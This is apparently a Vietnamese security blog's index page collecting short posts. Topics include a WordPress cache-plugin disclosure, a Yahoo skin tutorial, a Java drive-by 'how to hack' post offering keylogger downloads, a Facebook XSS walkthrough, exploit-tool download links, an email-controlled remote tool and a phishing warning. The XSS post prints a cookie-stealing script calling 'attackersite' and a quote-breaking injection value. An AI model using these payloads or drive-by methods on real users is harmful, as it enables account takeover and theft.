Trang

WordPress plugin W3 Total Cache critical Vulnerability disclosed

One of the most popular Wordpress Plugin called "W3 Total Cache" which is used to Improve site performance and user experience via caching, having potential vulnerability. On Christmas day, someone disclose it on full-disclosure site that how a plugin misconfiguration leads to possible Wordpress cms hack.

W3+Total+Cache+critical+Vulnerability








The loophole is actually activated on the fact that how W3TC stores the database cache. Jason disclosed that cache data is stored in public accessible directory, from where a malicious attack can can retrieve password hashes and other database information.
Default location where this plugin stores data is "/wp-content/w3tc/dbcache/" and if directory listing is enabled, attacker can browse and download it.
He said,"Even with directory listings off, cache files are by default publicly downloadable, and the key values / file names of the database cache items are easily predictable."

Because the plugin is very famous ,so this makes quite easy for hackers to play with WordPress blogs. Author also publish a simple shell script to identify and exploit this bug.

We would like to recommend webmasters to either upgrade the plugin to new version or deny access to plugin directory by making an extra .htccess in that folder.

Theo: THN

Xem Thêm

 

Hướng dẫn tự tạo skin cho Yahoo

Bài này Cơm tự làm chứ không copy ở đâu về cả ,hình ảnh minh họa từ A->Z

Trước tiên mọi người vào đây để tải reshack về:

http://www.angusj.com/resourcehacker/
Phần mềm thay đổi định dạng và kích thước ảnh có sẵn tại đây: http://vibe.vn/threads/49925/

Sau khi tải về xong, các bạn vào thư mục chứa yahoo, vào messenger >> resources >> vi - VN (hoặc vi - US, tùy yahoo của bạn), sau đó copy cái file res_msgr.dll ra 1 chỗ nào đó tùy bạn. Như hình mình copy ra ngoài desktop:


 1.700x0

Bật reshack lên open và chọn file res_msgr.dll đã copy ra desktop 2.700x0
 

Sau khi mở file res_msgr.dll rehack sẽ hiện ra như này: 3.700x0

Các bạn chọn Dialog -> tìm đến 929 -> 1033 hoặc 1066. Sau đó chèn đoạn code này vào dưới cùng:

CONTROL 100, 0, STATIC, SS_BITMAP | WS_CHILD | WS_VISIBLE | WS_CLIPSIBLINGS | WS_GROUP, 65480, 65534, 315, 385

Sau khi chèn xong bạn nhấn nút Compile Script để save lại.

Sau đó các bạn chọn mục Action trên thanh công cụ

chọn Add new resource -> Open file with new resource -> tìm đến file ảnh muốn làm theme.
Chú ý: file ảnh định dạng .bmp và nên tìm 1 ảnh có kích thước tương đương với kích thước của Y!H hoặc lớn hơn!!
Sau khi chọn đường dẫn cho background. 2 ô ở dưới bạn gõ như sau

Dòng thứ 3 điền 1066 hay 1033 tùy thuộc vào [ Dialog -> tìm đến 929 -> 1033 hoặc 1066] lúc nãy
Nếu là 1033 thì các bạn đổi thông số ở ô thứ 3 là 1033. Còn nếu là 1066 thì để giống hình. Sau đó ấn vào nút Add resource.
sau đó các bạn vào lại Dialog -> tìm đến 929 -> 1033 hoặc 1066 để chỉnh kích thước hoặc vị trí theme theo ý muốn

Sau khi sửa xong file res_msgr.dll ở ngoài desktop. Các bạn tắt hết Y!H đi nhé và copy file đó vào trong thư mục, như thế là xong rồi và mở yahoo lên nào, đẹp quá final.700x0

Chúc các bạn thành công . Nguồn : vibe.vn

Xem Thêm

 

How to Hack Using a Java Drive by | Detailed video tutorial

What is a Java drive ?

A Java Drive-By is a Java Applet that is coded in Java and is put on a website. Once you click "Run" on the pop-up, it will download a program off the internet. This program can be a virus or even a simple downloader. If you'd like to get the source code or wanna know more information about a Java Drive-By, use Google.



Here is a detailed video tutorial of java drive >>

  • Downlaod Java drive files from here 
  • Download keylogger from here

Xem Thêm

 

Khai thác lỗ hổng XSS/CSS trên Facebook

Cross Site Scripting (còn được gọi là XSS hay CSS) là một trong những kỹ thuật tấn công tầng ứng dụng (L7) phổ biến nhất.

Thông thường, hầu hết kiểu khai thác Cross-Site Scripting đều liên quan đến việc gửi cookie của nạn nhân tới máy của kẻ tấn công thông qua Javascript.



<script>
document.write("<img src='http://attackersite/a.gif?x=" + escape(document.cookie + "'>")
</script>[/i]
Trong khi khai thác lỗ hổng Cross-Site Scripting, kẻ tấn công sẽ không dựa vào cookie mà chúng đánh cắp được, mà attacker có thể tiêm code Javascript vào website của nạn nhân. Attacker cũng có thể thực hiện các hành động nguy hiểm khác.

xssattack

Trong trường hợp đối với Fb, quá trình được diễn ra như sau:

1. Đọc messages cá nhân của nạn nhân.
2. Lấy và chỉnh sửa ảnh cá nhân của nạn nhân.
3. Gửi thông điệp tới những contacts của nạn nhân.
4. Thêm những ứng dụng Facebook mới.
5. Đánh cắp contacts.

Mô tả chi tiết khai thác lỗ hổng Cross-Site Scripting trên Fb.

Facebook sử dụng PHP scripts. Scripts này đã bị khai thác từ tháng 7/2010. http://www.facebook....ve_uploader.php

Script chứa những thông số khác nhau, một trong số chúng - controller_id: đầu vào trực tiếp bên trong của một thẻ script của người dùng. Vd: http://www.facebook....0&post_upload=1

HTML body mà chúng ta cần quan tâm:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["c4c288b438ed080"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Bạn sẽ nhận thấy rằng giá trị controller_id (c4c288b438ed080) được viết trực tiếp bên trong đoạn Javascript của trang HTML. Bằng cách chèn double quote, attacker có khả năng thoát khỏi chuỗi key của array và chèn  Javascript trực tiếp bên trong một trang facebook.com, thay đổi thông số controller_id dễ dàng:

controller_id=test”]}; alert(“facebook test”); //

Điều này làm thay đổi nội dung sau:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["test"]}; alert("facebook test"); //"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Nội dung này sẽ chạy alert box:

facebook_xss

Ở giai đoạn này attacker cần phải làm là đọc nội dung JSON giống như client-side scripts của Fb.

Cách thức khai thác lỗ hổng XSS để chiếm tài khoản Fb

Để đạt được mục đích này, attacker có thể gọi file mở rộng .js trên Web Server của anh ta để add thêm nhiều code.  Số frameworks giúp chuyên gia bảo mật hoặc attacker khai thác lỗ hổng CSS, giống như BeEF.

Trong TH này, chúng ta sẽ tùy biến code để chỉ định những tính năng nào được hiển thị.

Javascript code hướng dẫn web browser của nạn nhân đọc danh sách private messages tìm thấy trên http://www.facebook..../home/inbox.php. Code phân tích từng ID message. Với mỗi message, Javascript code của attacker sẽ đọc được message http://www.facebook..../ReadThread.php.

Cuối cùng, attacker có thể nhận được nội dung message trực tiếp từ máy chủ web server của anh ta.

Trong đoạn video dưới đây, chúng ta sẽ thấy cách thức attacker gửi nội dung nhạy cảm của victim thông qua Facebook chat.


Tham khảo thêm tại:

[1] - http://www.acunetix....e-scripting.htm
[i][2] - http://www.acunetix....ss-facebook.htm


Nguồn: Bảo Mật Hệ Thống.

Xem Thêm

 

SQL Injection - Labs series

Link to part 1: http://www.securitytube.net/video/4171
Link to part 2: http://www.securitytube.net/video/4200
Link to part 3: http://www.securitytube.net/video/4208
Link to part 4: http://www.securitytube.net/video/4210
Link to part 5: http://www.securitytube.net/video/4269
Link to part 6: http://www.securitytube.net/video/4283
Link to part 7: http://www.securitytube.net/video/4303
Link to part 8: http://www.securitytube.net/video/4326
Link to part 9: http://www.securitytube.net/video/4399
Link to part 10: http://www.securitytube.net/video/4532
Link to part 11: http://www.securitytube.net/video/4650
Link to part 12: http://www.securitytube.net/video/4667
Link to part 13: http://www.securitytube.net/video/4672
Link to part 14: http://www.securitytube.net/video/4672
Link to part 15: http://www.securitytube.net/video/5104
Link to part 16: http://www.securitytube.net/video/5562
Link to part 17: http://www.securitytube.net/video/6035
Link to part 18: http://www.securitytube.net/video/6176


Link for test bed: https://github.com/Audi-1/sqli-labs

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Xem Thêm

 

XSS Shell

Xem Thêm

 

Điều khiển máy tính từ xa qua Gmail

Có một vài tiện ích cho phép tạo kết nối điều khiến từ xa với máy tính. Nếu bạn đang cần gấp một kết nối để điều khiển máy tính từ xa mà chỉ yêu cầu mức cơ bản với cấu hình tối thiểu thì bạn có thể thực hiện thông qua tài khoản Gmail. sRemote là một ứng dụng bỏ túi nhỏ cho phép điều khiển từ xa máy tính thông qua tài khoản Gmail. Chương trình cho phép thực hiện một số câu lệnh cơ bản trên máy đầu xa qua Gmail.

Tải sRemote về máy. Giải nén file zip trong một thư mục. Khi sử dụng sRemote lần đầu tiên, chương trình sẽ đề nghị người dùng tạo một mật khẩu để truy cập máy tính mà sRemote đang chạy trên đó.

[Hình: sremote1.jpg]

Lưu ý rằng không nên cung cấp mật khẩu này cho người khác bởi vì bất cứ ai có mật khẩu này đều có thể điều khiển từ xa máy tính của bạn.

Bước tiếp theo liên quan đến việc thiết lập chứng thực Gmail cho sRemote. Chỉ cần kích vào Gmail settings và nhập địa chỉ Gmail, mật khẩu và địa chỉ hồi đáp.

[Hình: sremote2.jpg]

Một điều lưu ý là nếu người dùng đã kích hoạt chế độ xác thực hai bước trong tài khoản Gmail thì sẽ cần cấu hình một mật khẩu mới cho ứng dụng sRemote. Mật khẩu gốc cho tài khoản Gmail sẽ không có hiệu lực.

Sau khi cấu hình xong các thiết lập tài khoản Gmail, kích vào nút Start monitoring. sRemote sẽ kiểm tra tài khoản Gmail người dùng. Khoảng thời gian giám sát mặc định là 5 giây nhưng ta có thể cấu hình lại tùy theo yêu cầu.

[Hình: sremote3.jpg]

Và đây là phần thú vị nhất khi bạn sẽ thực hiện ra lệnh cho máy tính đầu xa. Người dùng có thể sử dụng bất kỳ địa chỉ email nào và bất cứ thiết bị nào. Về cơ bản, người dùng sẽ phải gửi một email với cú pháp câu lệnh đặc biệt đến tài khoản Gmail đã được cấu hình trước đó (trong sRemote). Ví dụ như, nếu ta có email mycomputer@gmail.com được cấu hình trong sRemote, có thể gửi một email từ anyone@hotmail.com đến mycomputer@gmail.com với cú pháp sau:

password() ;command() ;

Với “password()” là mật khẩu người dùng đã cấu hình khi khởi động sRemote và “command()” là bất cứ câu lệnh nào mà sRemote hỗ trợ. Những câu lệnh này phải nằm trong dòng subject của email.

[Hình: sremote4.jpg]

sRemote chấp nhận những câu lệnh sau:

1. screenshot() ;
2. shutdown() ;
3. logoff() ;
4. restart() ;
5. abort() ;
6. run(program,parameters) ;
7. play(path) ;
8. msg(text) ;
9. log(text) ;
10. exit() ;
11. beep() ;
12. forceshut() ;
13. mail(sender,password,receiver,body,subject) ;
14. processes() ;
15. ping(address) ;
16. getfile(path) ;
17. delfile(path) ;
18. deldir(path) ;
19. uptime() ;
20. copy(oldpath,newpath) ;
21. move(oldpath,newpath) ;
22. help() ;

Xét tổng thể thì sRemote là một chương trình tiện dụng và thực sự hữu ích khi ai đó đang cần gấp một kết nối điều khiển từ xa trong vài phút. Có hai điểm cần được cải thiện trong sRemote. Thứ nhất là sRemote không hỗ trợ các địa chỉ Google Apps mà cũng sử dụng công nghệ của Gmail. Thứ hai, không có xác nhận cho biết câu lệnh có được thực hiện trên máy tính đầu xa hay không. Có lẽ, cần có một email hồi đáp thông báo rằng, câu lệnh đã được thực hiện thành công trên máy đầu xa.

Link sRemote: https://sites.google.com/site/venussoftr...ects=0&d=1

Xem Thêm

 

Perl Attack Tools

Giới thiệu về tính năng các lựa chọn trong menu mình sẽ giới thiệu sau. Đây là demo của em nó!
[Hình: talent.PNG]
***mình hi vọng tool được ủng hộ và phát triển ở Việt Nam. Mọi sự sao chép mong các bạn tôn trọng bản quyền của tác giả
Thanks to -->Persia Security Group<--
links: http://www.mediafire.com/?nq8o41fyfqtisah
pass: talentkong@ceh.vn

Xem Thêm

 

Xenotix XSS Exploit Framework v.2 Released

Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. This tool can inject codes into a webpage which are vulnerable to XSS.
test report.

Features: 

Built in XSS Payloads
XSS Key logger
XSS Executable Drive-by downloader
Automatic XSS Testing
XSS Encoder
 XSS Reverse Shell (new)

Download: https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip

Xem Thêm

 

4 vấn nạn bảo mật đáng sợ nhất 2013

Bảo mật di động và phần mềm tống tiền “nổi loạn”, xung đột mạng trở nên căng thẳng hơn, các chuyên gia bảo mật đã chỉ ra 4 xu hướng bảo mật nổi bật của năm 2012 và nhiều khả năng sẽ tiếp diễn trong năm 2013.

1. Xung đột mạng trở nên phổ biến


[Hình: 20121221111311-secure.jpg]

Năm 2013 và cả những năm tiếp sau, xung đột mạng giữa các quốc gia, các tổ chức và cá nhân sẽ trở thành tâm điểm trong thế giới mạng. Gián điệp công nghệ vừa có tỷ lệ thành công cao, vừa dễ dàng phủi tay, chối bỏ trách nhiệm sau khi tiến hành. Đã có nhiều ví dụ thực tế để cảnh báo về xu hướng này trong vòng 2 năm trở lại đây mà điển hình là vụ sâu Stuxnet tấn công Iran. Trong năm 2013, chúng ta sẽ thấy môi trường mạng trở thành một chiến trường khi mà các quốc gia, các tổ chức, thậm chí các nhóm và các cá nhân sử dụng những cuộc tấn công mạng để thể hiện sức mạnh của họ hay đơn thuần chỉ là “gửi đi thông điệp”.

Bên cạnh đó, hãng bảo mật Symantec cũng dự đoán sẽ có nhiều cuộc tấn công mạng nhắm tới các cá nhân và các tổ chức phi chính phủ, chẳng hạn như những người/nhóm người ủng hộ các vấn đề về chính trị và thành viên của các nhóm dân tộc thiểu số xung đột với nhau. Loại hình tấn công có chủ đích này đã xuất hiện khi các nhóm hacker như LulzSec hay Anonymous được hỗ trợ bởi một cá nhân hoặc một công ty đứng đằng sau.

2. Phần mềm tống tiền (ransomeware) trở thành nỗi ám ảnh mới


[Hình: 20121221111549-ransomware-%281%29.jpg]

Khi phần mềm diệt virus giả mạo tạm lắng xuống thì một mô hình doanh nghiệp tội phạm, mới và cao cấp hơn sẽ lại nổi lên. Symantec dự báo phần mềm tống tiền (ransomeware) sẽ phát triển mạnh do chúng không chỉ lừa phỉnh nạn nhân mà còn đe dọa và bắt nạt họ. Mặc dù “mô hình kinh doanh” này đã từng được thử nghiệm trước đó nhưng nó cũng có những mặt hạn chế tương tự như kiểu “bắt cóc tống tiền” trong đời sống thực: không có một cách thức nào là hoàn hảo để thu tiền cả. Tuy vậy, tội phạm mạng ngày nay đã tìm ra một giải pháp cho vấn đề này, đó là sử dụng các phương thức thanh toán trực tuyến. Chúng có thể dùng áp lực thay vì phải bịa chuyện để lấy tiền từ nạn nhân.

Một trong những khả năng quan trọng là phần mềm tống tiền sẽ vượt mặt các phần mềm diệt virus giả mạo để trở thành con át chủ bài của tội phạm mạng trong năm tới.

3. Phần mềm quảng cáo di động tăng mạnh

[Hình: 20121221111549-android-malware.jpg]

Phần mềm quảng cáo trên di động (mobile adware - còn gọi tắt là madware) là những phần mềm khá phiền toái và làm gián đoạn trải nghiệm người dùng. Không chỉ vậy, những phần mềm này còn tiềm ẩn rủi ro như làm lộ chi tiết về địa điểm, thông tin liên lạc cũng như nhận dạng thiết bị cho tội phạm mạng. Madware sẽ lẻn vào thiết bị của người dùng khi họ tải về một ứng dụng và thường xuyên gửi các pop-up cảnh báo trên thanh thông báo thêm biểu tượng, thay đổi cài đặt trình duyệt và thu thập thông tin cá nhân.

Chỉ trong vòng 9 tháng vừa qua, số lượng các ứng dụng, bao gồm cả những biến thể phần mềm quảng cáo di động táo tợn nhất, đã tăng lên tới 210%. Việc sử dụng phần mềm quảng cáo di động sẽ tăng mạnh do ngày càng có nhiều công ty mong muốn tăng trưởng lợi nhuận nhanh chóng thông qua quảng cáo di động.

4. Kiếm tiền trên các mạng xã hội – những kẽ hở mới nguy hiểm

[Hình: 20121221111743-facebook-woman.jpg]

Là người dùng, chúng ta đặt một niềm tin khá lớn vào mạng xã hội – từ việc chia sẻ những thông tin cá nhân tới việc chi tiền cho các trò chơi, tặng quà cho bạn bè. Khi những mạng xã hội này bắt đầu hình thành các phương thức kiếm tiền trên các nền tảng của họ bằng cách cho phép người dùng mua và gửi những món quà thật, thì xu hướng tiêu dùng ngày càng tăng trên các mạng xã hội cũng gợi ý cho tội phạm mạng những phương pháp mới để tạo tiền để cho các cuộc tấn công của chúng.

Các chuyên gia bảo mật dự đoán số lượng các cuộc tấn công bằng phần mềm độc hại nhằm ăn cắp thông tin thanh toán của người dùng trên các mạng xã hội hoặc lừa phỉnh họ cung cấp các chi tiết thanh toán hoặc những thông tin cá nhân/ thông tin có giá trị tới các mạng xã hội giả mạo sẽ tăng mạnh. Cụ thể, người dùng có thể nhận được thông báo về một món quà giả mạo và những thông điệp gửi qua email, yêu cầu họ cho biết địa chỉ nhà và những thông tin cá nhân khác. Mặc dù cung cấp thông tin phi tài chính có vẻ là vô thưởng vô phạt, nhưng tội phạm mạng có thể bán và giao dịch những thông tin này với nhau để kết hợp với thông tin mà chúng đã có sẵn về bạn. Điều này có thể giúp chúng tạo ra một hồ sơ cá nhân riêng về bạn và sau đó sử dụng để tìm cách truy nhập vào các tài khoản khác của bạn.


Theo Vietnamnet

Xem Thêm

 

Cảnh báo: Phising email lừa gạt cư dân Facebook

Phishing email là loại email trá hình nhằm lừa gạt người sử dụng. Trong nhiều trường hợp đường dẫn tin tặc cung cấp chứa đầy vi rút.

Đây là một ví dụ gần đây, tin tặc tìm cách lừa gạt cư dân Facebook.

[Hình: Screen-Shot-2012-12-20-at-12.53.18-PM.png]


Khi nhận được email bên dưới và mới đọc thoáng qua, chúng ta nghĩ là Facebook thông báo cho biết tài khoản Facebook của mình đã bị khóa lại. Do đó phải bấm vô đường dẫn trong email để xác nhận.

Tuy nhiên nếu xem kỹ lại thì

1. Hàng From: tuy đề là Facebook.Team nhưng địa chỉ lại là @blackswantribe.com.au. Rõ ràng đây là email giả mạo rồi.

2. Đường dẫn (URL) trong email nhìn thì thấy là http://www.facebook.com, nhưng nếu nhấp chuột (đừng bấm chuột) vào thì địa chỉ thật sự hiện ra lại là http://datingcool-2013.info/.....

Do đó bạn đừng bao giờ vội bấm vào bất cứ đường dẫn nào trong một email dù là khả nghi hay là có vẻ như đến từ người quen. Phải phối kiểm lại cho kỹ. Nếu không chắc, không thấy an tâm thì tốt nhất chúng ta lờ đi.

Trong trường hợp này, thay vì bấm vào đường dẫn, bạn kiểm tra bằng cách đăng nhập Facebook như thường lệ. Nếu vẫn đăng nhập bình thường, thì đây rõ ràng là email giả mạo.

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương